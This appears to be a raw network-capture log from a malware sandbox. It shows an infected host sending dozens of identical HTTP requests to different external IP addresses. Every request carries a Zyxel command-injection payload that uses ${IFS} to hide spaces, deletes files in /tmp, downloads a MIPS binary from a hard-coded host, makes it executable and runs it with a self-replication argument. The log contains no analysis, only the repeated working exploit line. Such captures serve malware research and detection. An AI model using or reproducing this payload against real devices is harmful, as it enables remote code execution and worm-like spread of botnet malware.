                                                        Jan 28, 2024 10:13:02.581372023 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6765192.168.2.1453244174.74.210.227443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:02.581412077 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6766192.168.2.1460068218.65.161.197443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:02.581465006 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6767192.168.2.145256037.157.227.248443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:02.581490993 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6768192.168.2.144375425.105.150.202443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:02.581530094 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6769192.168.2.1449510113.162.46.211443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:02.581589937 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6770192.168.2.1449964121.218.245.252443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:02.581641912 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6771192.168.2.145248677.12.240.220443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:02.581696987 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6772192.168.2.1459838182.160.245.27443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:02.581718922 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6773192.168.2.1456602110.182.61.162443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:02.581743956 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6774192.168.2.145021471.7.162.54443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:02.581790924 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6775192.168.2.145003627.210.227.45443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:02.581832886 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6776192.168.2.144138698.221.190.184443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:02.581882954 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6777192.168.2.143456860.76.210.151443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:02.581927061 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6778192.168.2.1455880188.241.238.5443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:02.581969976 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6779192.168.2.1460722145.183.13.245443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:02.581995964 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6780192.168.2.1451752120.120.62.69443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:02.582063913 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6781192.168.2.1460962156.36.146.225443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:02.582112074 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6782192.168.2.145412295.219.39.54443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:02.582148075 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6783192.168.2.1443694216.113.104.38443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:02.582181931 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6784192.168.2.145406881.201.67.202443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:02.582220078 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6785192.168.2.1455544156.196.196.169443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:02.582252979 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6786192.168.2.145837283.45.211.154443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:02.582309961 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6787192.168.2.1436590142.58.145.233443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:02.582336903 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6788192.168.2.1441120152.203.93.24443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:02.582389116 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6789192.168.2.1448346163.243.44.240443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:02.582422972 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6790192.168.2.1437232131.95.72.199443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:02.582451105 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6791192.168.2.1445558133.164.237.37443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:02.582490921 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6792192.168.2.1435664180.50.10.166443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:02.582544088 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6793192.168.2.143963896.162.170.166443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:02.582576036 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6794192.168.2.1434832186.235.1.199443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:02.582604885 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6795192.168.2.144434848.244.46.204443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:02.582637072 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6796192.168.2.1435380122.53.25.83443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:02.582655907 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6797192.168.2.1446830170.210.23.76443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:02.582685947 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6798192.168.2.145288649.202.218.103443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:02.582746029 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6799192.168.2.145753054.47.169.96443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:02.582772970 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6800192.168.2.144431040.249.187.200443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:02.582820892 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6801192.168.2.145939469.81.145.101443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:02.582858086 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6802192.168.2.1457058146.98.142.143443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:02.582891941 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6803192.168.2.144769041.94.141.21443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:02.582926989 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6804192.168.2.1440272116.174.240.124443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:02.582968950 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6805192.168.2.144911484.22.206.80443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:02.583013058 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6806192.168.2.145886878.192.12.135443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:02.583048105 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6807192.168.2.144092439.175.35.23443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:02.583077908 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6808192.168.2.1457648152.43.206.181443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:02.583128929 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6809192.168.2.1447480130.6.245.69443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:02.583164930 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6810192.168.2.1456252128.241.116.154443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:02.583206892 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6811192.168.2.143661889.32.218.214443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:02.583242893 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6812192.168.2.1444390201.19.139.203443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:02.583276987 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6813192.168.2.1452876116.93.72.89443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:02.583311081 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6814192.168.2.144393054.22.121.14443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:02.583364010 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6815192.168.2.144722859.76.170.175443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:02.583404064 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6816192.168.2.1434370111.121.195.192443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:02.583450079 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6817192.168.2.144737094.197.145.107443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:02.583476067 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6818192.168.2.143959824.240.118.238443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:02.583518028 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6819192.168.2.1453328169.212.162.16443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:02.583560944 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6820192.168.2.1433518221.222.65.47443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:02.583605051 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6821192.168.2.143813676.190.92.252443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:02.583632946 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6822192.168.2.1435844178.83.127.201443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:02.583676100 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6823192.168.2.143610237.124.150.24443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:02.583725929 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6824192.168.2.1452920132.78.7.237443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:02.583758116 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6825192.168.2.1447650145.192.53.93443
                                                        TimestampBytes transferredDirectionData
